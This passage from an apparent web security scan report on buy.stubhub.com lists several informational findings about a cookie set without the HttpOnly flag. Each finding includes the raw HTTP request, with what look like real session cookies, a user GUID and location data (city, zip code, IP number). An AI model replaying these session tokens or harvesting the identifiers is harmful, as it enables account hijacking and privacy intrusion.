Expires: Wed, 16 Feb 2011 12:12:18 GMT
Cache-Control: max-age=1800
Vary: Accept-Encoding
Set-Cookie: TLTHID=CEDFB4A639C110397CCC904C887D2E22; Path=/; Domain=.stubhub.com


4.15. https://buy.stubhub.com/promotions/scratch/foresee/foresee-analytics-bottom-e9f04.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /promotions/scratch/foresee/foresee-analytics-bottom-e9f04.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /promotions/scratch/foresee/foresee-analytics-bottom-e9f04.js HTTP/1.1
Host: buy.stubhub.com
Connection: keep-alive
Referer: https://buy.stubhub.com/checkout/CheckoutSignin?ticket_id=281933854&quantity_selected=2&price=100&logisticsMethod=2
Cache-Control: max-age=0
If-Modified-Since: Wed, 26 Jan 2011 22:59:58 GMT
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=986DBE4039C110390BC5EFD87B2B5667; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; mbox=check#true#1297856567|session#1297856457596-151700#1297858367|PC#1297856457596-151700.17#1332070907|disable#browser%20timeout#1297860107; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/CheckoutSignin","genre":"default","genreid":"","event":"default","eventid":"default","genreparentid":"","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$100.00'","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":7,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":7,"s":true,"e":1}},"cd":1,"sd":1,"f":1297856546782,"l":"en","i":-1}; TLTHID=CDEAF3B239C110395C82A19FC1E4C140

Response

HTTP/1.1 304 Not Modified
Date: Wed, 16 Feb 2011 11:42:18 GMT
Server: Apache
Connection: Keep-Alive
Keep-Alive: timeout=5, max=1600
Expires: Thu, 16 Feb 2012 11:42:18 GMT
Cache-Control: max-age=31536000
Vary: Accept-Encoding
Set-Cookie: TLTHID=CEE212D239C1103934CA8D4B3446FCC6; Path=/; Domain=.stubhub.com


4.16. https://buy.stubhub.com/promotions/scratch/foresee/foresee-analytics-top-e9f04.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /promotions/scratch/foresee/foresee-analytics-top-e9f04.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /promotions/scratch/foresee/foresee-analytics-top-e9f04.js HTTP/1.1
Host: buy.stubhub.com
Connection: keep-alive
Referer: https://buy.stubhub.com/checkout/CheckoutSignin?ticket_id=281933854&quantity_selected=2&price=100&logisticsMethod=2
Cache-Control: max-age=0
If-Modified-Since: Thu, 18 Nov 2010 21:49:07 GMT
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=986DBE4039C110390BC5EFD87B2B5667; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; mbox=check#true#1297856567|session#1297856457596-151700#1297858367|PC#1297856457596-151700.17#1332070907|disable#browser%20timeout#1297860107; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/CheckoutSignin","genre":"default","genreid":"","event":"default","eventid":"default","genreparentid":"","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$100.00'","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":7,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":7,"s":true,"e":1}},"cd":1,"sd":1,"f":1297856546782,"l":"en","i":-1}; TLTHID=CDEAF3B239C110395C82A19FC1E4C140

Response

HTTP/1.1 304 Not Modified
Date: Wed, 16 Feb 2011 11:42:18 GMT
Server: Apache
Connection: Keep-Alive
Keep-Alive: timeout=5, max=1600
Expires: Thu, 16 Feb 2012 11:42:18 GMT
Cache-Control: max-age=31536000
Vary: Accept-Encoding
Set-Cookie: TLTHID=CEE1D53839C1103976C8ACBDDDE7ECCC; Path=/; Domain=.stubhub.com


4.17. https://buy.stubhub.com/promotions/scratch/foresee/foresee-trigger.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /promotions/scratch/foresee/foresee-trigger.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /promotions/scratch/foresee/foresee-trigger.js HTTP/1.1
Host: buy.stubhub.com
Connection: keep-alive
Referer: https://buy.stubhub.com/checkout/CheckoutSignin?ticket_id=281933854&quantity_selected=2&price=100&logisticsMethod=2
Cache-Control: max-age=0
If-Modified-Since: Wed, 17 Nov 2010 22:28:59 GMT
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=986DBE4039C110390BC5EFD87B2B5667; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; mbox=check#true#1297856567|session#1297856457596-151700#1297858367|PC#1297856457596-151700.17#1332070907|disable#browser%20timeout#1297860107; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/CheckoutSignin","genre":"default","genreid":"","event":"default","eventid":"default","genreparentid":"","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$100.00'","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":7,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":7,"s":true,"e":1}},"cd":1,"sd":1,"f":1297856546782,"l":"en","i":-1}; TLTHID=CDEAF3B239C110395C82A19FC1E4C140

Response

HTTP/1.1 304 Not Modified
Date: Wed, 16 Feb 2011 11:42:18 GMT
Server: Apache
Connection: Keep-Alive
Keep-Alive: timeout=5, max=1599
Expires: Thu, 16 Feb 2012 11:42:18 GMT
Cache-Control: max-age=31536000
Vary: Accept-Encoding
Set-Cookie: TLTHID=CF138F2E39C1103958ACC35B4524558D; Path=/; Domain=.stubhub.com


4.18. https://buy.stubhub.com/promotions/scratch/lt/www-2.0.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /promotions/scratch/lt/www-2.0.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /promotions/scratch/lt/www-2.0.css HTTP/1.1
Host: buy.stubhub.com
Connection: keep-alive
Referer: https://buy.stubhub.com/checkout/CheckoutSignin?ticket_id=281933854&quantity_selected=2&price=100&logisticsMethod=2
Cache-Control: max-age=0
If-Modified-Since: Wed, 02 Feb 2011 23:54:38 GMT
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=986DBE4039C110390BC5EFD87B2B5667; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; mbox=check#true#1297856567|session#1297856457596-151700#1297858367|PC#1297856457596-151700.17#1332070907|disable#browser%20timeout#1297860107; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/CheckoutSignin","genre":"default","genreid":"","event":"default","eventid":"default","genreparentid":"","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$100.00'","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":7,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":7,"s":true,"e":1}},"cd":1,"sd":1,"f":1297856546782,"l":"en","i":-1}; TLTHID=CDEAF3B239C110395C82A19FC1E4C140

Response

HTTP/1.1 304 Not Modified
Date: Wed, 16 Feb 2011 11:42:18 GMT
Server: Apache
Connection: Keep-Alive
Keep-Alive: timeout=5, max=1600
Expires: Thu, 16 Feb 2012 11:42:18 GMT
Cache-Control: max-age=31536000
Vary: Accept-Encoding
Set-Cookie: TLTHID=CEDEEA2639C11039789D94000C1CF856; Path=/; Domain=.stubhub.com


4.19. https://buy.stubhub.com/promotions/scratch/sh/footer_grad.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /promotions/scratch/sh/footer_grad.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /promotions/scratch/sh/footer_grad.gif HTTP/1.1
Host: buy.stubhub.com
Connection: keep-alive
Referer: https://buy.stubhub.com/checkout/CheckoutSignin?ticket_id=281933854&quantity_selected=2&price=100&logisticsMethod=2
Cache-Control: max-age=0
If-Modified-Since: Thu, 09 Apr 2009 16:32:49 GMT
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=986DBE4039C110390BC5EFD87B2B5667; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; mbox=check#true#1297856609|session#1297856457596-151700#1297858409|PC#1297856457596-151700.17#1332070949|disable#browser%20timeout#1297860107; fsr.a=1297856549180; TLTHID=CF183E4839C11039789E94000C1CF856; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/CheckoutSignin","genre":"default","genreid":"","event":"default","eventid":"default","genreparentid":"","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$100.00'","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":7,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":7,"s":true,"e":1}},"cd":1,"sd":1,"f":1297856546782,"l":"en","i":-1}

Response

HTTP/1.1 304 Not Modified
Date: Wed, 16 Feb 2011 11:42:19 GMT
Server: Apache
Connection: Keep-Alive
Keep-Alive: timeout=5, max=1600
Expires: Wed, 16 Feb 2011 12:12:19 GMT
Cache-Control: max-age=1800
Set-Cookie: TLTHID=CF560F4839C1103958ADC35B4524558D; Path=/; Domain=.stubhub.com


4.20. https://buy.stubhub.com/promotions/scratch/sh/footer_hands.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /promotions/scratch/sh/footer_hands.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /promotions/scratch/sh/footer_hands.gif HTTP/1.1
Host: buy.stubhub.com
Connection: keep-alive
Referer: https://buy.stubhub.com/checkout/CheckoutSignin?ticket_id=281933854&quantity_selected=2&price=100&logisticsMethod=2
Cache-Control: max-age=0
If-Modified-Since: Thu, 09 Apr 2009 16:33:18 GMT
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
